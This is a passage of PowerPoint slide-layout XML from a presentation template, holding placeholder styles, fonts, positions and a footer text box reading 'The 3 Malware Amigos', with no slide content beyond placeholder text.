                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="689964" marR="0" lvl="1"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3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="988386" marR="0" lvl="2" indent="-298419"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667" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1369348" marR="0" lvl="3" indent="-287835"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133" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1748191" marR="0" lvl="4"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1867" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172207" y="942896"/>
            <a:ext cx="5621215" cy="5369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422036" y="180487"/>
            <a:ext cx="11371383" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="51431" tIns="36001" rIns="51431" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11536683" y="6311900"/>
            <a:ext cx="653796" cy="546101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="51432" tIns="25715" rIns="51432" bIns="25715" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1333" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="1219080"/>
            <a:fld id="{A12C446D-6113-E749-B2D6-33109B9D4DC9}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="1219080"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5616840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FIR_single-text_subtitle">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422036" y="1728969"/>
            <a:ext cx="11371383" cy="4582935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="309003" marR="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sz="3733"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="689964" marR="0" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="3200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="988386" marR="0" indent="-298419" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2667"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1369348" marR="0" indent="-287835" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2133"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1748191" marR="0" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="309003" marR="0" lvl="0" indent="-309003" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3733" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="689964" marR="0" lvl="1"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3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="988386" marR="0" lvl="2" indent="-298419"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667" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1369348" marR="0" lvl="3" indent="-287835"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2133" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1748191" marR="0" lvl="4" indent="-273024" algn="l" defTabSz="914286" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B4B4B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1867" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422036" y="1037763"/>
            <a:ext cx="11371383" cy="589935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457131" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914264" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1867"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371396" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828528" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285662" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742790" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199920" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657051" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422036" y="180487"/>
            <a:ext cx="11371383" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="51431" tIns="36001" rIns="51431" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11536683" y="6311900"/>
            <a:ext cx="653796" cy="546101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="51432" tIns="25715" rIns="51432" bIns="25715" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1333" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
                <a:ea typeface="Gill Sans MT" charset="0"/>
                <a:cs typeface="Gill Sans MT" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="1219080"/>
            <a:fld id="{A12C446D-6113-E749-B2D6-33109B9D4DC9}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="1219080"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12207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9024" y="71394"/>
            <a:ext cx="10747014" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="0" cap="none" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556239"/>
            <a:ext cx="5893661" cy="4340567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>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60070" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar cha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34390" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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08710" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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383030" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835724FA-D287-F042-A50D-440303D70BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483578" y="6484294"/>
            <a:ext cx="1237839" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 3 Malware Amigos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537F9D8-8DF5-D549-B114-5CE0E3BB477E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861647" y="1222130"/>
            <a:ext cx="1820008" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975"/>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390ABC9-906A-D346-97F2-B035E1669C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11027090" y="5822212"/>
            <a:ext cx="1324164" cy="1324164"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9025CF8D-B577-E04E-8BD7-258464EA455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771651" y="6484294"/>
            <a:ext cx="721292" cy="210944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1948942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9024" y="71394"/>
            <a:ext cx="10738221" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="0" cap="none" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4985238" y="1556239"/>
            <a:ext cx="6392007" cy="4340567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>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60070" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="20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34390" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="18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08710" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="16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383030" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="24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extBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835724FA-D287-F042-A50D-440303D70BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483578" y="6484294"/>
            <a:ext cx="1237839" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 3 Malware Amigos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537F9D8-8DF5-D549-B114-5CE0E3BB477E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861647" y="1222130"/>
            <a:ext cx="1820008" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975"/>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95ED07B-0C21-AC44-A8B7-5A21919380F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771651" y="6484294"/>
            <a:ext cx="721292" cy="210944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7743A11-65AF-B144-BDE4-E3B13D5F7D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
